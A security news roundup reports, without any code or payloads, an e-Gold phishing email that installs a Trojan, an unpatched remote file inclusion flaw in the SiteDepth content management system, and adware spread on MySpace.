News Stay informed about the latest enterprise technology news and product updates.

Security Bytes: Spam that glitters isn't gold

Also: Some adult Web site operators may have a new threat to worry about and McAfee warns that not everyone on MySpace wants to be your friend.

Spam that glitters isn't gold
According to the SANS Internet Storm Center, an emerging email scam could result in end-users' computers becoming infected by a string of malicious files.

In a posting to the ISC Handler's Diary Sunday, ISC Director Marcus Sachs detailed the contents of an email that has started making the rounds in recent days.

The text of the message includes information about an alleged transaction involving e-Gold Ltd., an electronic payment site. The author attempts to convince the recipient that she lost currency from a transaction, but includes a screenshot detailing the problem called When opened, that file drops a series of executables and .dll files on a victim's machine, one of which includes a spyware-spreading Trojan that attempts to steal e-Gold account information.

Sachs said the issue and analysis were submitted to the ISC by a reader. "Readers… are the backbone of the SANS Internet Storm Center and we really appreciate those who send in their own analysis for us to turn around in alerts to others," Sachs said.

SiteDepth subject to .php vulnerability
The French Security Incident Responst Team (FrSIRT) is one of several organizations warning of a flaw in SiteDepth, a content management system used primarily by adult Web site operators, that could enable attackers to execute arbitrary commands.

Late last week FrSIRT warned of the issue, which was first reported by David "Aesthetico" Vieira-Kurz of German security firm Major Security.

"This flaw is due to an input validation error in the 'constants.php' script that fails to validate the 'SD_DIR' parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the Web server," said FrSIRT.

The issue affects SiteDepth version 3.0.1 and prior. A patch has not yet been issued by the vendor.

McAfee warns of adware on MySpace
Social networking site MySpace may be popular among young and old alike, but not all the media clips being shared there are for harmless fun.

In its Avert Labs Blog, antivirus vendor McAfee Inc. warned that not only have a pair of MySpace viruses circulated this year, but it's also become a hotbed for adware.

More specifically, McAfee's Allysa Myers noted the recent Washington Post report that an advertisement posted on MySpace used the Windows Meta File (WMF) exploit that Microsoft patched earlier this year to install adware. Plus, another organization has reportedly created fake MySpace profiles to increase adware installations.

That means harmless MySpace surfing during the workday may not be so harmless after all. "There's really nothing to prevent profiles being created for questionable purposes," Myers wrote.

Dig Deeper on Web application and API security best practices

Start the conversation

Send me notifications when other members comment.

Please create a username to comment.